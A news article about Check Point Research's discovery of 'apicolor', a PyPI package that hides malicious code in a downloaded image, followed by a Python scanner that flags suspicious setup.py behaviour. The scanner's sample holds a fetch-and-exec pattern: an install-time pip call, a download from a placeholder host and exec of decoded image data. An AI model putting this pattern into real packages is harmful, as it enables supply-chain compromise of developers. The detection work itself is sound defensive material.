Cybersecurity researchers at Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language. The package uses an image to deliver Trojan malware and relies largely on GitHub to reach its victims.
The threat actors behind this new campaign hope that Python developers will come across “apicolor” sooner or later when searching the web for legitimate projects.
The package, which presents itself on PyPI as a harmless project still under development, does three things once installed: it first installs two additional requirements itself, then downloads an image from the Internet, and finally uses those requirements to process the image and runs the output of that processing with Python's exec command.
One of the two requirements is judyb, which is essentially a steganography module capable of revealing messages hidden inside images. That led the researchers back to the downloaded image, which, it turns out, carries hidden code that fetches further malicious packages from the Internet onto the victim's endpoint.
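The install-time behaviour described above (a setup script that shells out to pip, fetches something from the network, and then exec()s data it did not ship with) is exactly the pattern a reviewer can look for statically. The following scanner is an added example written for this article, not CPR's tooling and not the apicolor package's own code. It parses a setup.py with Python's ast module and flags the three building blocks; the two setup scripts embedded in it are constructed samples, and the package name stegolib and the URL in the suspicious sample are placeholders, not real identifiers from the campaign.

```python
import ast
from typing import List, Tuple

# Constructed samples for this example, not the real apicolor setup.py.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo", version="0.1", install_requires=["requests"])
'''

SUSPICIOUS_SETUP = '''
import subprocess, sys, requests
from setuptools import setup

subprocess.check_call([sys.executable, "-m", "pip", "install", "stegolib"])
img = requests.get("http://example.invalid/logo.png").content
import stegolib
exec(stegolib.reveal(img))

setup(name="demo", version="0.1")
'''

# Callees that commonly wrap an install-time "pip install" or a download.
INSTALL_CALLS = {"subprocess.check_call", "subprocess.run", "subprocess.call",
                 "subprocess.Popen", "os.system"}
NETWORK_CALLS = {"requests.get", "urllib.request.urlopen", "urlopen"}


def _call_name(node: ast.Call) -> str:
    """Return the callee as a dotted name, e.g. 'subprocess.check_call'."""
    parts = []
    func = node.func
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def _mentions_pip(call: ast.Call) -> bool:
    """True if any string literal among the call's arguments contains a 'pip' token."""
    for sub in ast.walk(call):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            if "pip" in sub.value.split():
                return True
    return False


def scan_setup(source: str) -> List[str]:
    """Flag install-time pip calls, network fetches and exec/eval of non-literal data."""
    findings: List[Tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in INSTALL_CALLS and _mentions_pip(node):
            findings.append((node.lineno, f"line {node.lineno}: install-time pip invocation via {name}"))
        elif name in NETWORK_CALLS:
            findings.append((node.lineno, f"line {node.lineno}: network fetch via {name}"))
        elif name in ("exec", "eval"):
            # A string literal passed to exec is at least visible on the page; anything
            # else (a decoded image, a downloaded blob) is opaque until run time.
            literal = all(isinstance(a, ast.Constant) and isinstance(a.value, str) for a in node.args)
            if not node.args or not literal:
                findings.append((node.lineno, f"line {node.lineno}: {name}() on non-literal data (possible decoded payload)"))
    # ast.walk is breadth-first, so sort by line to report in source order.
    return [msg for _, msg in sorted(findings)]


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_setup(src) or "no findings")
```

Run it against a package's setup.py before installing it, or over the extracted sdist of anything that reaches a build pipeline. It is a heuristic: a legitimate `exec(open("pkg/version.py").read())` will also trip the exec rule, and an installer that builds its pip command string at run time will slip past the literal-token check, so treat a hit as a reason to read the file, not as a verdict.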
“The direct place to research such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, which helped the team better understand their infection techniques (if someone accidentally installed them and, if they did, how it happened). Using this search, it became clear that apicolor and judyb are quite niche and little used on GitHub projects.”
Once CPR notified PyPI of its findings, the latter removed the malicious package from its platform.
While the researchers couldn’t determine who the threat actor behind this campaign was, they did say that the entire operation was “carefully planned and thought out,” adding that the obfuscation techniques used on PyPI have evolved.
“We continuously scan PyPI for malicious packages and report them responsibly to PyPI. This one is unique and different from almost any malicious packages we’ve encountered before,” said Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company.
“This package differs in the way it camouflages its intent and the way it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packages and their obfuscation techniques are evolving rapidly. The package we have shared here reflects careful and painstaking work. It’s not the ordinary copy and paste we often see, but what looks like a real campaign. Creating the GitHub projects, cleverly hiding the code, and downplaying the packages on PyPI are all advanced work.”